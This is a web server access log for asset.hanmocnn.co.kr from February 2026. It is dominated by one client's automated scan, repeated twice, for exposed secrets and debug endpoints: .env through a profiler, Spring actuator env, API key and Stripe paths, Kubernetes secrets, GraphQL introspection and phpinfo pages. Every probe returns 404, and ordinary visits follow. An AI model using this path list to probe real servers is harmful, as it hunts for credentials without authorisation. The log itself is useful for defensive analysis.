[15/Feb/2026:00:18:54 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/configprops" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:54 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/config" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:54 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vscode/sftp.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:54 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/settings" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:55 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/docker-compose.yml" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:55 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:55 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/stripe" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:55 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[15/Feb/2026:00:18:55 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/keys" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:56 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/payment/config" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:56 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/dashboard" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:57 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:57 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[15/Feb/2026:00:18:58 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/settings" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:59 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/settings" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:59 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_ignition/health-check" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:18:59 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[15/Feb/2026:00:19:00 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:00 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/telescope/requests" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:01 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/horizon/api/stats" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:01 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[15/Feb/2026:00:19:01 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_profiler" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:01 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_profiler/latest" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_profiler/open?file=.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app_dev.php/_profiler" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app_dev.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_wdt" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__debug__/" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/webpack-dev-server" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__webpack_dev_server__/sockjs-node/info" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/info.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/phpinfo.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:05 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/test.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:05 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/i.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/php_info.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/v1/namespaces/default/secrets" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/graphql?query={__schema{types{name,fields{name}}}}" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/server-status" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:07 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/server-info" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:14 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[15/Feb/2026:00:19:21 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[15/Feb/2026:00:19:22 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
|
||||||
|
[15/Feb/2026:00:19:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/actuator/configprops" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/manage/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/manage/configprops" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/v1/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/v2/actuator/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/configprops" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/config" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/settings" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/stripe" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/keys" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/payment/config" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/dashboard" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/settings" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/settings" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_ignition/health-check" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/telescope/requests" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/horizon/api/stats" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_profiler" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_profiler/latest" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_profiler/open?file=.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app_dev.php/_profiler" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app_dev.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/_wdt" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__debug__/" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/webpack-dev-server" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:31 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__webpack_dev_server__/sockjs-node/info" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:31 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__cve_probe_cve_test_404" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:31 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/info.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:31 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/phpinfo.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/test.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/i.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/php_info.php" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/v1/namespaces/default/secrets" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/graphql?query={__schema{types{name,fields{name}}}}" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/server-status" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:19:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/server-info" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[15/Feb/2026:00:21:12 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:21:12 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:21:12 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:21:12 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:21:20 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:00:34:07 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 81.29.142.100] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 YaBrowser/21.3.3.230 Yowser/2.5 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:34:08 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 81.29.142.100] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15" "-"
|
||||||
|
[15/Feb/2026:00:34:09 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 81.29.142.100] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 YaBrowser/21.3.3.230 Yowser/2.5 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:34:09 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 81.29.142.100] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15" "-"
|
||||||
|
[15/Feb/2026:00:34:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 81.29.142.100] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 YaBrowser/21.3.3.230 Yowser/2.5 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:34:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 81.29.142.100] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15" "-"
|
||||||
|
[15/Feb/2026:00:34:19 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 81.29.142.6] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:00:34:20 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 81.29.142.6] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "-"
|
||||||
|
